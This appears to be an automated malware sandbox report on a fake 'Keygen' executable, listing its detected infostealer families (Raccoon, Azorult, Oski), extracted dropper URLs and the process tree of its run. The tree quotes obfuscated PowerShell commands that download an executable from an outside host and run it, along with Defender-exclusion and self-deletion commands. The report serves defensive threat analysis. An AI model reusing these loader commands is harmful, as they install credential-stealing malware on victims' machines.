Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    149s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    02-10-2020 21:14

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (34) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 23:30:56 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (478 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (34) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (34) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1516
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\87F5.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (34) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1620
      • C:\Users\Admin\AppData\Local\Temp\87F5.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1964
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\87F5.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2028
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1112
          • C:\Users\Public\vkf.exe
            "C:\Users\Public\vkf.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2524
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2604
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2724
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2724 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\202059676752257\\* & exit
                  8⤵
                    PID:1032
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2724
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2136
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2632
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2752
              • C:\Users\Public\vkf.exe
                "C:\Users\Public\vkf.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2684
                • C:\Users\Admin\AppData\Local\Temp\nDZ50WSbLo.exe
                  "C:\Users\Admin\AppData\Local\Temp\nDZ50WSbLo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2952
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\nDZ50WSbLo.exe"'
                    8⤵
                      PID:2692
                  • C:\Users\Admin\AppData\Local\Temp\EALuORZgr1.exe
                    "C:\Users\Admin\AppData\Local\Temp\EALuORZgr1.exe"
                    7⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    PID:2824
                    • C:\Windows\SysWOW64\Notepad.exe
                      "C:\Windows\System32\Notepad.exe"
                      8⤵
                        PID:612
                    • C:\Users\Admin\AppData\Local\Temp\52sZFvDgql.exe
                      "C:\Users\Admin\AppData\Local\Temp\52sZFvDgql.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      PID:2996
                      • \??\c:\windows\SysWOW64\cmstp.exe
                        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\fxgdsx3o.inf
                        8⤵
                          PID:1684
                      • C:\Users\Admin\AppData\Local\Temp\ohM6L2JDG5.exe
                        "C:\Users\Admin\AppData\Local\Temp\ohM6L2JDG5.exe"
                        7⤵
                        • Executes dropped EXE
                        • Windows security modification
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3068
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" Get-MpPreference -verbose
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2700
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\vkf.exe"
                        7⤵
                          PID:2808
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /T 10 /NOBREAK
                            8⤵
                            • Delays execution with timeout.exe
                            PID:2220
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\87F5.tmp\m1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:2008
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1444
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 1
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1988
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\87F5.tmp\b.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1076
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
